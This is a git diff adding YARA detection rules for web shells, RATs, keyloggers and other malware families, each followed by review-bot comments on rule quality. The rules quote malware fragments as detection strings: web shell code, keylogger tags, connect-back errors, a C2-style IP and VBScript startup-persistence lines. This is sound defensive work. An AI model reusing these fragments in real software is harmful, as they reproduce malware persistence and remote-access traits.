+		1 of ($s*) or all of ($x*) or all of ($y*)
+}
+
+rule ASPXspy2 {
+	meta:
+		description = "Web shell - file ASPXspy2.aspx"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/24"
+		hash = "5642387d92139bfe9ae11bfef6bfe0081dcea197"
+	strings:
+		$s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii
+		$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
+		$s3 = "Process[] p=Process.GetProcesses();" fullword ascii
+		$s4 = "Response.Cookies.Add(new HttpCookie(vbhLn,Password));" fullword ascii
+		$s5 = "[DllImport(\"kernel32.dll\",EntryPoint=\"GetDriveTypeA\")]" fullword ascii
+		$s6 = "<p>ConnString : <asp:TextBox id=\"MasR\" style=\"width:70%;margin:0 8px;\" CssCl" ascii
+		$s7 = "ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();" fullword ascii
+		$s8 = "Copyright &copy; 2009 Bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_bla" ascii
+		$s10 = "Response.AddHeader(\"Content-Disposition\",\"attachment;filename=\"+HttpUtility." ascii
+		$s11 = "nxeDR.Command+=new CommandEventHandler(this.iVk);" fullword ascii
+		$s12 = "<%@ import Namespace=\"System.ServiceProcess\"%>" fullword ascii
+		$s13 = "foreach(string innerSubKey in sk.GetSubKeyNames())" fullword ascii
+		$s17 = "Response.Redirect(\"http://www.rootkit.net.cn\");" fullword ascii
+		$s20 = "else if(Reg_Path.StartsWith(\"HKEY_USERS\"))" fullword ascii
+	condition:
+		6 of them
+}
diff --git a/malware/Wimmie.yar b/malware/Wimmie.yar
new file mode 100644
index 0000000..6313470
--- /dev/null
+++ b/malware/Wimmie.yar
@@ -0,0 +1,52 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule WimmieShellcode : Wimmie Family 
+{
+    meta:
+        description = "Wimmie code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-17"
+        
+    strings:
+        // decryption loop
+        $ = { 49 30 24 39 83 F9 00 77 F7 8D 3D 4D 10 40 00 B9 0C 03 00 00 }
+        $xordecrypt = {B9 B4 1D 00 00 [8] 49 30 24 39 83 F9 00 }
+        
+    condition:
+        any of them
+}
+
+rule WimmieStrings : Wimmie Family
+{
+    meta:
+        description = "Strings used by Wimmie"
+        author = "Seth Hardy"
+        last_modified = "2014-07-17"
+        
+    strings:
+        $ = "\x00ScriptMan"
+        $ = "C:\\WINDOWS\\system32\\sysprep\\cryptbase.dll" wide ascii
+        $ = "ProbeScriptFint" wide ascii
+        $ = "ProbeScriptKids"
+        
+    condition:
+        any of them
+
+}
+
+rule Wimmie : Family
+{
+    meta:
+        description = "Wimmie family"
+        author = "Seth Hardy"
+        last_modified = "2014-07-17"
+   
+    condition:
+        WimmieShellcode or WimmieStrings
+        
+}
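Review bot: `import "pe"` at the top of this file is unused — none of the three rules reference a `pe.` field — and the same unused import is repeated in every other new file in this commit (WoolenGoldfish.yar, Xtreme.yar, YahLover.yar, Yayih.yar, Zegost.yar, Zeus.yar, cxpid.yar, favorite.yar, iexpl0ree.yar, jRAT.yar, naspyupdate.yar, netwiredRC.yar); dropping it, or adding a comment noting it is intentionally kept for a later rule, would keep the module load from looking like a leftover. Separately, in `WimmieStrings` the path `C:\\WINDOWS\\system32\\sysprep\\cryptbase.dll` is a widely documented DLL-sideload location that also appears in unrelated tooling and write-ups, and with `any of them` it alone fires the rule and therefore the `Wimmie` family rule; if the author considers that acceptable a comment saying so would help, otherwise it could be moved out of the `any of` set.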
diff --git a/malware/WoolenGoldfish.yar b/malware/WoolenGoldfish.yar
new file mode 100644
index 0000000..da8f93b
--- /dev/null
+++ b/malware/WoolenGoldfish.yar
@@ -0,0 +1,99 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule WoolenGoldfish_Sample_1 {
+	meta:
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		author = "Florian Roth"
+		reference = "http://goo.gl/NpJpVZ"
+		date = "2015/03/25"
+		score = 60
+		hash = "7ad0eb113bc575363a058f4bf21dbab8c8f7073a"
+	strings:
+		$s1 = "Cannot execute (%d)" fullword ascii
+		$s16 = "SvcName" fullword ascii
+	condition:
+		all of them
+}
+
+rule WoolenGoldfish_Generic_1 {
+	meta:
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		author = "Florian Roth"
+		reference = "http://goo.gl/NpJpVZ"
+		date = "2015/03/25"
+		score = 90
+		super_rule = 1
+		hash0 = "5d334e0cb4ff58859e91f9e7f1c451ffdc7544c3"
+		hash1 = "d5b2b30fe2d4759c199e3659d561a50f88a7fb2e"
+		hash2 = "a42f1ad2360833baedd2d5f59354c4fc3820c475"
+	strings:
+		$x0 = "Users\\Wool3n.H4t\\"
+		$x1 = "C-CPP\\CWoolger"
+		$x2 = "NTSuser.exe" fullword wide
+
+		$s1 = "107.6.181.116" fullword wide
+		$s2 = "oShellLink.Hotkey = \"CTRL+SHIFT+F\"" fullword
+		$s3 = "set WshShell = WScript.CreateObject(\"WScript.Shell\")" fullword
+		$s4 = "oShellLink.IconLocation = \"notepad.exe, 0\"" fullword
+		$s5 = "set oShellLink = WshShell.CreateShortcut(strSTUP & \"\\WinDefender.lnk\")" fullword
+		$s6 = "wlg.dat" fullword
+		$s7 = "woolger" fullword wide
+		$s8 = "[Enter]" fullword
+		$s9 = "[Control]" fullword
+	condition:
+		( 1 of ($x*) and 2 of ($s*) ) or
+		( 6 of ($s*) )
+}
+
+rule WoolenGoldfish_Generic_2 {
+	meta:
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		author = "Florian Roth"
+		reference = "http://goo.gl/NpJpVZ"
+		date = "2015/03/25"
+		score = 90
+		hash1 = "47b1c9caabe3ae681934a33cd6f3a1b311fd7f9f"
+		hash2 = "62172eee1a4591bde2658175dd5b8652d5aead2a"
+		hash3 = "7fef48e1303e40110798dfec929ad88f1ad4fbd8"
+		hash4 = "c1edf6e3a271cf06030cc46cbd90074488c05564"
+	strings:
+		$s0 = "modules\\exploits\\littletools\\agent_wrapper\\release" ascii
+	condition:
+		all of them
+}
+
+rule WoolenGoldfish_Generic_3 {
+	meta:
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		author = "Florian Roth"
+		reference = "http://goo.gl/NpJpVZ"
+		date = "2015/03/25"
+		score = 90
+		hash1 = "86222ef166474e53f1eb6d7e6701713834e6fee7"
+		hash2 = "e8dbcde49c7f760165ebb0cb3452e4f1c24981f5"
+	strings:
+		$x1 = "... get header FATAL ERROR !!!  %d bytes read > header_size" fullword ascii
+		$x2 = "index.php?c=%S&r=%x&u=1&t=%S" fullword wide
+		$x3 = "connect_back_tcp_channel#do_connect:: Error resolving connect back hostname" fullword ascii
+
+		$s0 = "kernel32.dll GetProcAddressLoadLibraryAws2_32.dll" fullword ascii
+		$s1 = "Content-Type: multipart/form-data; boundary=%S" fullword wide
+		$s2 = "Attempting to unlock uninitialized lock!" fullword ascii
+		$s4 = "unable to load kernel32.dll" fullword ascii
+		$s5 = "index.php?c=%S&r=%x" fullword wide
+		$s6 = "%s len:%d " fullword ascii
+		$s7 = "Encountered error sending syscall response to client" fullword ascii
+		$s9 = "/info.dat" fullword ascii
+		$s10 = "Error entering thread lock" fullword ascii
+		$s11 = "Error exiting thread lock" fullword ascii
+		$s12 = "connect_back_tcp_channel_init:: socket() failed" fullword ascii
+	condition:
+		( 1 of ($x*) ) or
+		( 8 of ($s*) )
+}
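Review bot: `WoolenGoldfish_Sample_1` requires only `all of them` over two very generic strings, `"Cannot execute (%d)"` and `"SvcName"`, both of which are plausible in benign service wrappers, so the rule is likely to produce false positives despite its score of 60; a cheap tightening is a file-type guard in the condition, e.g. `uint16(0) == 0x5A4D and all of them`, optionally with a `filesize <` bound (threshold to be tuned, constructed value not on the page). The `description` meta in all four rules reads "Detects a operation Woolen-Goldfish sample"; "an operation" is meant.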
diff --git a/malware/Xtreme.yar b/malware/Xtreme.yar
new file mode 100644
index 0000000..1960b6a
--- /dev/null
+++ b/malware/Xtreme.yar
@@ -0,0 +1,112 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Xtreme
+{
+    meta:
+        description = "Xtreme RAT"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $string1 = /(X)tremeKeylogger/ wide ascii
+        $string2 = /(X)tremeRAT/ wide ascii
+        $string3 = /(X)TREMEUPDATE/ wide ascii
+        $string4 = /(S)TUBXTREMEINJECTED/ wide ascii
+
+        $unit1 = /(U)nitConfigs/ wide ascii
+        $unit2 = /(U)nitGetServer/ wide ascii
+        $unit3 = /(U)nitKeylogger/ wide ascii
+        $unit4 = /(U)nitCryptString/ wide ascii
+        $unit5 = /(U)nitInstallServer/ wide ascii
+        $unit6 = /(U)nitInjectServer/ wide ascii
+        $unit7 = /(U)nitBinder/ wide ascii
+        $unit8 = /(U)nitInjectProcess/ wide ascii
+
+    condition:
+        5 of them
+}
+
+rule xtreme_rat : Trojan
+{
+	meta:
+		author="Kevin Falcoz"
+		date="23/02/2013"
+		description="Xtreme RAT"
+	
+	strings:
+		$signature1={58 00 54 00 52 00 45 00 4D 00 45} /*X.T.R.E.M.E*/
+		
+	condition:
+		$signature1
+}
+
+rule XtremeRATCode : XtremeRAT Family 
+{
+    meta:
+        description = "XtremeRAT code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-09"
+    
+    strings:
+        // call; fstp st
+        $ = { E8 ?? ?? ?? ?? DD D8 }
+        // hiding string
+        $ = { C6 85 ?? ?? ?? ?? 4D C6 85 ?? ?? ?? ?? 70 C6 85 ?? ?? ?? ?? 64 C6 85 ?? ?? ?? ?? 62 C6 85 ?? ?? ?? ?? 6D }
+    
+    condition:
+        all of them
+}
+
+rule XtremeRATStrings : XtremeRAT Family
+{
+    meta:
+        description = "XtremeRAT Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-09"
+        
+    strings:
+        $ = "dqsaazere"
+        $ = "-GCCLIBCYGMING-EH-TDM1-SJLJ-GTHR-MINGW32"
+        
+    condition:
+       any of them
+}
+
+rule XtremeRAT : Family
+{
+    meta:
+        description = "XtremeRAT"
+        author = "Seth Hardy"
+        last_modified = "2014-07-09"
+        
+    condition:
+        XtremeRATCode or XtremeRATStrings
+}
+
+rule xtremrat : rat
+{
+	meta:
+		author = "Jean-Philippe Teissier / @Jipe_"
+		description = "Xtrem RAT v3.5"
+		date = "2012-07-12" 
+		version = "1.0" 
+		filetype = "memory"
+
+	strings:
+		$a = "XTREME" wide
+		$b = "XTREMEBINDER" wide
+		$c = "STARTSERVERBUFFER" wide
+		$d = "SOFTWARE\\XtremeRAT" wide
+		$e = "XTREMEUPDATE" wide
+		$f = "XtremeKeylogger" wide
+		$g = "myversion|3.5" wide
+		$h = "xtreme rat" wide nocase
+	condition:
+		2 of them
+}
+
+
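Review bot: `xtreme_rat` fires on `$signature1` alone, and that hex is just `"XTREME" wide` without its terminating null, so any file containing the word in UTF-16 matches; the sibling `xtremrat` rule in this same file treats `"XTREME" wide` as one of eight strings and requires `2 of them`, and `xtreme_rat` should either be tightened the same way or folded into it. In rule `Xtreme`, the patterns `/(X)tremeKeylogger/`, `/(U)nitConfigs/` and so on contain no regex features beyond the capture group; if the group is there so the rule does not match its own source file when the ruleset is scanned, a comment such as `// capture group prevents self-match on this .yar file` would stop a maintainer from "simplifying" them to plain strings, and if it is not, plain strings like `$string1 = "XtremeKeylogger" wide ascii` avoid the regex engine entirely.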
diff --git a/malware/YahLover.yar b/malware/YahLover.yar
new file mode 100644
index 0000000..eafff47
--- /dev/null
+++ b/malware/YahLover.yar
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule YahLover : Worm
+{
+	meta:
+		author="Kevin Falcoz"
+		date="10/06/2013"
+		description="YahLover"
+		
+	strings:
+		$signature1={42 00 49 00 54 00 52 00 4F 00 54 00 41 00 54 00 45 00 00 00 42 00 49 00 54 00 53 00 48 00 49 00 46 00 54 00 00 00 00 00 42 00 49 00 54 00 58 00 4F 00 52}
+		
+	condition:
+		$signature1
+}
+
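Review bot: `$signature1` is an uncommented 64-byte hex blob, but it decodes to three UTF-16 constants, "BITROTATE", "BITSHIFT" and "BITXOR", separated by null padding; a trailing comment in the style Xtreme.yar already uses (`/*X.T.R.E.M.E*/`), e.g. `/* "BITROTATE\0\0BITSHIFT\0\0\0\0BITXOR" in UTF-16 */`, would make the pattern reviewable without a hex editor. The null spacing is part of what makes this specific, so it should stay a hex string rather than being rewritten as three `wide` text strings.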
diff --git a/malware/Yayih.yar b/malware/Yayih.yar
new file mode 100644
index 0000000..751f566
--- /dev/null
+++ b/malware/Yayih.yar
@@ -0,0 +1,50 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule YayihCode : Yayih Family 
+{
+    meta:
+        description = "Yayih code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-11"
+    
+    strings:
+        //  encryption
+        $ = { 80 04 08 7A 03 C1 8B 45 FC 80 34 08 19 03 C1 41 3B 0A 7C E9 }
+    
+    condition:
+        any of them
+}
+
+rule YayihStrings : Yayih Family
+{
+    meta:
+        description = "Yayih Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-11"
+        
+    strings:
+        $ = "/bbs/info.asp"
+        $ = "\\msinfo.exe"
+        $ = "%s\\%srcs.pdf"
+        $ = "\\aumLib.ini"
+
+    condition:
+       any of them
+}
+
+rule Yayih : Family
+{
+    meta:
+        description = "Yayih"
+        author = "Seth Hardy"
+        last_modified = "2014-07-11"
+        
+    condition:
+        YayihCode or YayihStrings
+}
+
diff --git a/malware/Zegost.yar b/malware/Zegost.yar
new file mode 100644
index 0000000..fe68501
--- /dev/null
+++ b/malware/Zegost.yar
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Zegost : Trojan
+{
+	meta:
+		author="Kevin Falcoz"
+		date="10/06/2013"
+		description="Zegost Trojan"
+		
+	strings:
+		$signature1={39 2F 66 33 30 4C 69 35 75 62 4F 35 44 4E 41 44 44 78 47 38 73 37 36 32 74 71 59 3D}
+		$signature2={00 BA DA 22 51 42 6F 6D 65 00}
+		
+	condition:
+		$signature1 and $signature2
+}
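Review bot: `$signature1` is entirely printable ASCII and appears to decode to the base64-looking token "9/f30Li5ubO5DNADDxG8s762tqY=", so it would be clearer as a text string, `$signature1 = "9/f30Li5ubO5DNADDxG8s762tqY="`, or at least carry a comment with the decoded value; `$signature2` contains non-printable bytes and is rightly left as hex. Please confirm the decoding against the original sample before changing it, since a text string also changes how YARA builds its atoms.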
diff --git a/malware/Zeus.yar b/malware/Zeus.yar
new file mode 100644
index 0000000..3a90837
--- /dev/null
+++ b/malware/Zeus.yar
@@ -0,0 +1,25 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Windows_Malware : Zeus_1134
+    {
+            meta:
+                    author = "Xylitol xylitol@malwareint.com"
+                    date = "2014-03-03"
+                    description = "Match first two bytes, protocol and string present in Zeus 1.1.3.4"
+                    reference = "http://www.xylibox.com/2014/03/zeus-1134.html"
+                    
+            strings:
+                    $mz = {4D 5A}
+                    $protocol1 = "X_ID: "
+                    $protocol2 = "X_OS: "
+                    $protocol3 = "X_BV: "
+                    $stringR1 = "InitializeSecurityDescriptor"
+                    $stringR2 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"
+            condition:
+                    ($mz at 0 and all of ($protocol*) and ($stringR1 or $stringR2))
+    }
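Review bot: `$mz at 0` declares a two-byte string that YARA must scan for across the whole file only to check its offset; the usual form is to drop `$mz` and write the condition as `uint16(0) == 0x5A4D and all of ($protocol*) and ($stringR1 or $stringR2)`, which tests the header directly and avoids a very short atom. `$stringR2` is a stock IE7 user-agent string that appears in many benign binaries, but since it is only an alternative to `$stringR1` inside an `and` with all three protocol headers, it does not weaken the rule on its own.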
diff --git a/malware/cxpid.yar b/malware/cxpid.yar
new file mode 100644
index 0000000..f2faaa7
--- /dev/null
+++ b/malware/cxpid.yar
@@ -0,0 +1,49 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule cxpidStrings : cxpid Family
+{
+    meta:
+        description = "cxpid Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+        
+    strings:
+        $ = "/cxpid/submit.php?SessionID="
+        $ = "/cxgid/"
+        $ = "E21BC52BEA2FEF26D005CF"
+        $ = "E21BC52BEA39E435C40CD8"
+        $ = "                   -,L-,O+,Q-,R-,Y-,S-"
+        
+    condition:
+       any of them
+}
+
+rule cxpidCode : cxpid Family 
+{
+    meta:
+        description = "cxpid code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+    
+    strings:
+        $entryjunk = { 55 8B EC B9 38 04 00 00 6A 00 6A 00 49 75 F9 }
+    
+    condition:
+        any of them
+}
+
+rule cxpid : Family
+{
+    meta:
+        description = "cxpid"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+        
+    condition:
+        cxpidCode or cxpidStrings
+}
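Review bot: The last string in `cxpidStrings`, `"                   -,L-,O+,Q-,R-,Y-,S-"`, looks like a Pascal/Delphi compiler-switch block rather than something specific to the family, and with `any of them` it alone fires both this rule and `cxpid`; if that string has been checked against a clean corpus of Delphi binaries a comment saying so would help, otherwise consider requiring it only in combination with one of the other strings. A short comment on `$entryjunk` describing what the prologue does, as the other Seth Hardy files do for their hex patterns, would also help.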
diff --git a/malware/favorite.yar b/malware/favorite.yar
new file mode 100644
index 0000000..5e3740a
--- /dev/null
+++ b/malware/favorite.yar
@@ -0,0 +1,38 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule FavoriteCode : Favorite Family 
+{
+    meta:
+        description = "Favorite code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-24"
+    
+    strings:
+        // standard string hiding
+        $ = { C6 45 ?? 3B C6 45 ?? 27 C6 45 ?? 34 C6 45 ?? 75 C6 45 ?? 6B C6 45 ?? 6C C6 45 ?? 3B C6 45 ?? 2F }
+        $ = { C6 45 ?? 6F C6 45 ?? 73 C6 45 ?? 73 C6 45 ?? 76 C6 45 ?? 63 C6 45 ?? 65 C6 45 ?? 78 C6 45 ?? 65 }
+    
+    condition:
+        any of them
+}
+
+rule FavoriteStrings : Favorite Family
+{
+    meta:
+        description = "Favorite Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-24"
+        
+    strings:
+        $string1 = "!QAZ4rfv"
+        $file1 = "msupdater.exe"
+        $file2 = "FAVORITES.DAT"
+        
+    condition:
+       any of ($string*) or all of ($file*)
+}
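Review bot: `any of ($string*)` means the single string `"!QAZ4rfv"` fires `FavoriteStrings` on its own, and that value is a keyboard-walk pattern that can also appear in password lists, dictionaries and unrelated tooling; if it is meant to be a strong indicator on its own, a comment explaining why (for example that it is a hard-coded credential of this family) would justify the condition, otherwise `all of ($file*)` alone or `$string1 and 1 of ($file*)` would be safer. `FavoriteCode`'s hex patterns have a helpful comment; `FavoriteStrings` has none.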
diff --git a/malware/iexpl0ree.yar b/malware/iexpl0ree.yar
new file mode 100644
index 0000000..274ad13
--- /dev/null
+++ b/malware/iexpl0ree.yar
@@ -0,0 +1,66 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule iexpl0reCode : iexpl0ree Family 
+{
+    meta:
+        description = "iexpl0re code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-21"
+        
+    strings:
+        $ = { 47 83 FF 64 0F 8C 6D FF FF FF 33 C0 5F 5E 5B C9 C3 }
+        $ = { 80 74 0D A4 44 41 3B C8 7C F6 68 04 01 00 00 }
+        $ = { 8A C1 B2 07 F6 EA 30 04 31 41 3B 4D 10 7C F1 }
+        $ = { 47 83 FF 64 0F 8C 79 FF FF FF 33 C0 5F 5E 5B C9 C3 }
+        // 88h decrypt
+        $ = { 68 88 00 00 00 68 90 06 00 00 68 ?? ?? ?? ?? 89 3? E8 }
+        $ = { BB 88 00 00 00 53 68 90 06 00 00 68 ?? ?? ?? ?? 89 3? E8 }
+        
+    condition:
+        any of them
+}
+
+rule iexpl0reStrings : iexpl0re Family
+{
+    meta:
+        description = "Strings used by iexpl0re"
+        author = "Seth Hardy"
+        last_modified = "2014-07-21"
+        
+    strings:
+        $ = "%USERPROFILE%\\IEXPL0RE.EXE"
+        $ = "\"<770j (("
+        $ = "\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\IEXPL0RE.LNK"
+        $ = "\\Documents and Settings\\%s\\Application Data\\Microsoft\\Internet Explorer\\IEXPL0RE.EXE"
+        $ = "LoaderV5.dll"
+        // stage 2
+        $ = "POST /index%0.9d.asp HTTP/1.1"
+        $ = "GET /search?n=%0.9d&"
+        $ = "DUDE_AM_I_SHARP-3.14159265358979x6.626176"
+        $ = "WHO_A_R_E_YOU?2.99792458x1.25663706143592"
+        $ = "BASTARD_&&_BITCHES_%0.8x"
+        $ = "c:\\bbb\\eee.txt"
+        
+    condition:
+        any of them
+
+}
+
+rule iexpl0re : Family
+{
+    meta:
+        description = "iexpl0re family"
+        author = "Seth Hardy"
+        last_modified = "2014-07-21"
+   
+    condition:
+        iexpl0reCode or iexpl0reStrings
+        
+}
+
+
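Review bot: The first four hex patterns in `iexpl0reCode` are uncommented while the last two carry `// 88h decrypt`; a one-line comment on each saying what the sequence is (loop epilogue, decode loop, etc., as the author knows it) would let a reviewer judge whether they are still valid when the family is rebuilt. The `"\"<770j (("` string in `iexpl0reStrings` is also opaque enough that a comment on where it comes from would help.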
diff --git a/malware/jRAT.yar b/malware/jRAT.yar
new file mode 100644
index 0000000..24d5f21
--- /dev/null
+++ b/malware/jRAT.yar
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+rule jRAT_conf : rat 
+{
+	meta:
+		description = "jRAT configuration" 
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-10-11"
+		filetype = "memory"
+		version = "1.0" 
+		ref1 = "https://github.com/MalwareLu/config_extractor/blob/master/config_jRAT.py" 
+		ref2 = "http://www.ghettoforensics.com/2013/10/dumping-malware-configuration-data-from.html" 
+
+	strings:
+		$a = /port=[0-9]{1,5}SPLIT/ 
+
+	condition: 
+		$a
+}
diff --git a/malware/naspyupdate.yar b/malware/naspyupdate.yar
new file mode 100644
index 0000000..bcce7ab
--- /dev/null
+++ b/malware/naspyupdate.yar
@@ -0,0 +1,51 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule nAspyUpdateCode : nAspyUpdate Family 
+{
+    meta:
+        description = "nAspyUpdate code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-14"
+    
+    strings:
+        // decryption loop in dropper
+        $ = { 8A 54 24 14 8A 01 32 C2 02 C2 88 01 41 4E 75 F4 }
+        
+    condition:
+        any of them
+}
+
+rule nAspyUpdateStrings : nAspyUpdate Family
+{
+    meta:
+        description = "nAspyUpdate Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-14"
+        
+    strings:
+        $ = "\\httpclient.txt"
+        $ = "password <=14"
+        $ = "/%ldn.txt"
+        $ = "Kill You\x00"
+        
+    condition:
+        any of them
+}
+
+rule nAspyUpdate : Family
+{
+    meta:
+        description = "nAspyUpdate"
+        author = "Seth Hardy"
+        last_modified = "2014-07-14"
+        
+    condition:
+        nAspyUpdateCode or nAspyUpdateStrings
+}
+
+
diff --git a/malware/netwiredRC.yar b/malware/netwiredRC.yar
new file mode 100644
index 0000000..53c7d11
--- /dev/null
+++ b/malware/netwiredRC.yar
@@ -0,0 +1,48 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+rule NetWiredRC_B : rat 
+{
+	meta:
+		description = "NetWiredRC"
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2014-12-23"
+		filetype = "memory"
+		version = "1.1" 
+
+	strings:
+		$mutex = "LmddnIkX"
+
+		$str1 = "%s.Identifier"
+		$str2 = "%d:%I64u:%s%s;"
+		$str3 = "%s%.2d-%.2d-%.4d"
+		$str4 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]"
+		$str5 = "%.2d/%.2d/%d %.2d:%.2d:%.2d"
+		
+		$klg1 = "[Backspace]"
+		$klg2 = "[Enter]"
+		$klg3 = "[Tab]"
+		$klg4 = "[Arrow Left]"
+		$klg5 = "[Arrow Up]"
+		$klg6 = "[Arrow Right]"
+		$klg7 = "[Arrow Down]"
+		$klg8 = "[Home]"
+		$klg9 = "[Page Up]"
+		$klg10 = "[Page Down]"
+		$klg11 = "[End]"
+		$klg12 = "[Break]"
+		$klg13 = "[Delete]"
+		$klg14 = "[Insert]"
+		$klg15 = "[Print Screen]"
+		$klg16 = "[Scroll Lock]"
+		$klg17 = "[Caps Lock]"
+		$klg18 = "[Alt]"
+		$klg19 = "[Esc]"
+		$klg20 = "[Ctrl+%c]"
+
+	condition: 
+		$mutex or (1 of ($str*) and 1 of ($klg*))
+}
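Review bot: The second arm of the condition, `1 of ($str*) and 1 of ($klg*)`, can be satisfied by a generic date format string such as `$str5` together with `[Enter]`, both of which are plausible in benign software that logs input, so the rule is likely to produce false positives; raising the counts, for example `$mutex or (2 of ($str*) and 3 of ($klg*))`, should be tuned against a clean corpus. A comment on `$mutex` noting it is the mutex name would also make clear why it is allowed to fire alone.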